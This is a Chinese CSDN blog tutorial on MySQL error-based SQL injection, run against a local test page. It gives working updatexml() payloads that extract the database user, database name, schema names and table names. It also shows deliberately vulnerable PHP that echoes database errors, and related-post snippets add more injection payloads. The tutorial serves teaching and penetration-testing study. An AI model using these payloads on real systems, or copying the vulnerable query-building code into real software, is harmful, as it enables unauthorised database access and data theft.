Web安全原理剖析(四)——报错注入攻击

已于 2022-01-19 11:14:19 修改
阅读量1.7w 收藏 34
点赞数 46
分类专栏: Web渗透测试 文章标签: 安全漏洞 网络安全 信息安全
于 2021-09-10 14:10:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25505167/article/details/120220918
版权
本文详细介绍了SQL报错注入攻击的原理和步骤,包括利用updatexml()函数获取数据库信息,以及如何通过错误回显获取数据库的库名、表名和字段名。同时,分析了报错注入的代码实现,展示了当SQL语句因额外的单引号导致错误时,如何将错误信息暴露给攻击者。最后,讨论了如何通过修改代码来防止报错注入,提高系统的安全性。
摘要由CSDN通过智能技术生成

目录

1.8 报错注入攻击

  报错注入攻击的测试地址:http://127.0.0.1/sqli/error.php?username=1。

  访问该网址时,页面返回ok,如图28所示。


图28 访问username=1时页面的的结果

  访问http://127.0.0.1/sqli/error.php?username=1’,因为参数username的值是1’,在数据库中执行SQL时,会因为多了一个单引号而报错,输出到页面的结果如图29所示。


图29 访问username=1'时页面的的结果

  通过页面返回结果可以看出,程序直接将错误信息输入到了页面上,所以此处可以利用报错注入获取数据。报错注入有多种格式,此处利用函数updatexml()延时SQL语句获取user()的值,SQL语句如下所示。

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

Updatexml()函数:Updatexml(xml_target,xpath_expr,new_xml)

  • xml_target:需要操作的xml片段
  • xpath_expr:需要更新的xml路径(Xpath格式)
  • new_xml:更新后的内容

  其中0x7e是ASCII编码,解码结果为~,如图30所示。


图30 利用updatexml获取user()

  然后尝试获取当前数据库的库名,如图31所示,语句如下所示。

' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

图31 利用updatexml获取database()

  接着可以利用select语句继续获取数据库中的库名、表名和字段名,查询语句与Union注入的相同。因为报错注入只显示一条结果,所以需要使用limit语句。构造的语句如下所示。

' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+

  结果如图32所示,以此类推,可以获取所有数据库的库名。


图32 利用报错注入获取数据库名

  如图33所示,构造查询表的语句,如下所示,可以获取数据库test的表名。

' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1),0x7e),1)--+

图33 利用报错注入获取数据库表名

1.9 报错注入代码分析

  在报错注入页面中,程序获取GET参数username后,将username拼接到SQL语句中,然后到数据库查询。如果执行成功,技术处ok;如果出错,则通过echo mysqli_error(@&con)将错误信息输出到页面(mysqli_error返回上一个MySQL函数的错误),代码如下所示。

<?php
$con=mysqli_connect("localhost","root","root","test");
// 检测连接
if (mysqli_connect_errno())
{
    echo "连接失败: " . mysqli_connect_error();
}

$username = @$_GET['username'];
$sql = "select * from users where `username`='".$username."'";

if($result = mysqli_query($con,$sql))
{
    echo "ok";
}
else
{
    echo mysqli_error($con);
}

?>

  输入username=1’时,SQL语句为select *from users where `username`=‘1’。执行时,会因为多了一个单引号而报错。利用这种错误回显,我们可以通过floor()、updatexml()等函数将要查询的内容输出到页面上。

Phanton03167
关注
专栏目录
MyBatis中SQL注入攻击和防护——掌握技巧保护应用安全
程序员光剑
07-28 1228
随着互联网信息化、云计算等技术的发展,网站业务越来越多样化、个性化,对用户输入数据的安全性要求也越来越高。在WEB开发中,常用的一种方式是用SQL作为后台语言,通过ORM工具将数据存储到数据库中并进行相关查询。由于ORM框架本身的特点,容易受到SQL注入攻击。SQL注入(英语:SQL injection)指的是通过向服务器端发送非法的SQL命令,而不是使用有效的查询条件而访问数据库,最终获取不正确的数据。
Web安全之SQL注入攻击-报错注入
hack0919的博客
05-10 378
SQL注入长期位于OWASP TOP10 榜首,对Web 安全有着很大的影响
SQL注入报错注入攻击
coderge's CSDN Blog.
09-17 929
目录 1 环境介绍 2 实验过程 本文采用的是《Web安全攻防渗透测试实战指南》提供的代码及数据库。 1 环境介绍 在报销注入页面中,程序获取GET参数username后,将username拼接到SQL语句中,然后到数据库查询。如果执行成功,就输出ok;如果出错,则通过echo mysqli_ error($con),将错误信息输出到页面(mysqli_error返回上一个MySQL函数的错误),代码如下所示。 error.php <?php $con=mysqli_connect("
错误注入攻击总结(Fault Injection Attack)
GluttonousZX的专栏
01-08 8194
错误注入攻击,指在密码芯片设备中通过在密码算法中引入错误,导致密码设备产生错误结果,对错误结果进行分析从而得到密钥。 它比差分能量攻击(DPA,DifferentialPower Analysis)、简单能量攻击(SPA,SimplePower Analysis)、电磁分析攻击(EMA,ElectromagneticAnalysis)都更强大。
Error注入攻击
天天学安全专属博客
11-02 1558
Error注入,最详细的错误注入方法,最详细的error注入治疗,以及Error注入语句
SQL注入攻击报错注入
qq_36242914的博客
03-29 289
SQL注入攻击报错注入 1.floor(rand(0)*2) 注入语句:select and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 报错注入原理: 报错关键点group by floor((rand(0)*2)) 1. rand(0)生成一组以0为种子产生一组固定随机数:0.15522...,0.62088..
初学Web安全之sql注入(二)——报错注入
weixin_47531846的博客
11-20 696
知识补充: 前一篇提到了如何判断字符型与数字型以及字符型的闭合,不过在做sqli-labs靶场时,出现了id=(‘1’),甚至还有id=((‘1’))这样双括号包裹的,在这里笔者也是没想到,不过正常来说,开发人员是不会使用这种的,所以前篇提到的单引号双引号判断法,还是有用的。 其实页面有回显,判断出数字型以及字符型还有闭合,还是相对简单的,下面拿靶场举列 上图,我们将报错信息拿出来分析一下: ''1'' LIMIT 0,1' 将最外面的包裹引号去掉: '1'' LIMIT 0, 不难看出,我们输
WEB安全原理(1)——SQL注入
yuluotianjin的博客
09-01 588
1.Union注入 如果通过sql注入,页面上能获取预期信息,则可使用Union注入。 (1)判断是否存在注入点(区分下是数字型注入还是字符型注入) id=1 # 正常回值 id=1' # 异常回值 id=1 and 1=1 # 正常回值 id=1 and 1=2 # 异常回值 (2)判断表中的字段数 id=1 order by [1,2,3,……] 使用order by语句,后面跟随具体数字,这些数字可用于指代表中字段名,观察数字从1开始递增到哪个数字为止,界面回值均会正常,则那个终止的数字则为字段
Web安全——SQL注入漏洞
Newscoo的博客
07-31 579
OWASP——注入攻击什么是OWASP——注入攻击?一、SQL注入1、常见SQL注入2、错误回显导致SQL注入3、盲注(Bind Injection)4、Timing AttackTiming Attack的使用方法:二、数据库攻击技巧1、常见攻击方式2、命令执行3、攻击存储过程4、编码问题5、SQL Column Truncation三、防御SQL注入1、使用预编译语句防御2、使用存储过程防御3、使用安全函数防御、其他注入攻击其他注入攻击包括:XML注入、代码注入、CRLF注入。总结网安小白又又又来瞎咧
【小迪安全day12】WEB 漏洞——SQL 注入
RichUee的博客
12-04 921
WEB 漏洞-SQL 注入在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关 SQL 注入的核心。同样此类漏洞是WEB 安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。
在智能电网中实现针对错误数据注入攻击的有效检测
04-01
物联网(IoT)技术已广泛应用于智能电网中,以监控物理或环境状况。 特别是,状态估计是智能电网中基于IoT的重要应用程序,通过对电表测量和电力系统拓扑的分析,状态估计可用于系统监控以获得最佳的电网状态估计。 但是,错误数据注入攻击(FDIA)对状态估计造成严重威胁,这是检测困难的原因。 在本文中,我们提出了一种针对FDIA的有效检测方案。 首先,研究了反映智能电网物理特性的两个参数。 一个参数是从控制器到静态无功补偿器(CSSVC)的控制信号。 较大CSSVC表示存在强烈的电压波动。 另一个参数是定量节点电压稳定性指数(NVSI)。 较大的NVSI表示较高的漏洞级别。 其次,根据CSSVC和NVSI的值,提出了一种优化的聚类算法,将潜在的易受攻击节点分为几类。 最后,基于这些类别,提出了一种用于FDIA实时检测的检测方法。 仿真结果表明,该方案可以有效地检测出FDIA。
【漏洞挖掘】——105、POST注入深入剖析
最新发布
Fly_鹏程万里
06-21 78
POST是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如:我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以POST的方式提交的服务器后再由服务器端进行验证,如果以POST提交的参数存在注入点,那么将这种注入称之为"POST"注入
SQL注入攻击(SQL注入(SQLi)攻击)-报错注入
红目香薰
09-24 551
页面没有显示位 , 但有数据库的报错信息时 , 可使用报错注入 报错注入是最常用的注入方式 , 也是使用起来最方便(我觉得)的一种注入方式 updatexml(1,'~',3); 第二个参数包含特殊字符时,数据库会报错,并将第二个参数的内容显示在报错内容中 返回结果的长度不超过32个字符 MySQL5.1及以上版本使用 本次以SQLi第一关为案例 第一步,判断注入类型 我们在参数中加入一个单引号 ' , 看其会不会报错 ?id=1' 数据库返回了一个错误 , 从错误来.
CTFHUB-WEB-SQL注入-报错注入
weixin_43486981的博客
08-10 769
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 题目: 靶机环境:输入1时,显示正确 输入一个随意的字符串后,显示错误。 求数据库名:输入1 union select updatexml(1,concat(0x7e,database(),0x7e),1);,页面报错: 求表名:输入1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information
SQL注入报错注入
2301_80661529的博客
02-22 1422
然而,当XPath表达式构造不当,例如包含了非法字符或者尝试执行一个无法解析为有效XPath表达式的字符串时,函数会抛出错误,并且错误信息可能包含有关查询的信息,这便为报错注入提供了机会。floor()报错注入的原因是group by在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。这个表名可能不存在,服务器会抛出一个错误消息,可能揭示表是否存在的信息。
报错注入
weixin_41489908的博客
09-27 286
不是我不想,你上学我上班,我耽误你前程似锦,你耽误我成家立业,我的眼里都是烟花和生活,你的眼里都是未来和希望。。。 ---- 网易云热评 一、相关函数 1、rand():产生一个0-1之间随机数,rand(0),随机产生一个0-1的随机数,运行多次产生的结果一样 2、floor():向下取整,floor(rand()*2),随机产生0和1两个数 3、groupby:分组排列 4、count(*):统计数量 5、concat():将字符串连接起来 二、通过floor(...
web安全报错注入汇总
xlsj雪松的博客
01-16 311
1 报错注入 MySQL 报错注入主要分为以下几类: 1. BigInt 等数据类型溢出; 2. Xpath 语法错误; 3. count() + rand() + group_by() 导致重复; 4. 空间数据类型函数错误。 1.1 floor() rand(N) - 返回一个随机浮点数 v,范围是 0<=v<1.0;N 是可选提供的,如果提供了N,则会设定N为一个SEED floor(x) - 返回不大于 x 的最大整数 count(x) - 返回 x 数据集
3-Web安全——报错注入
网络安全
05-19 1261
当网站的页面上没有显示位用于展示SQL语句执行后的结果,但是sql语句执行有错误信息输出,那么攻击者可以利用注入过程中返回的错误信息进行判断。 报错注入就是客户端可以构造SQL语句,让错误信息中可以显示数据库内容的查询语句,当数据库执行SQL语句返回报错提示中包含数据库的内容。
实验吧 WEB 加了料的报错注入
weixin_43803070的博客
07-23 603
打开页面是post注入,又是报错注入。所以就用到了burp,后来发现burp不好用,加了消息头也不好用,不知道为啥。既然是post那么就用脚本吧。 1.首先正常传参: import requests url="http://ctf5.shiyanbar.com/web/baocuo/index.php" r=requests.session() s=r.post(url,data={'userna...
评论 96
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Phanton03167

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值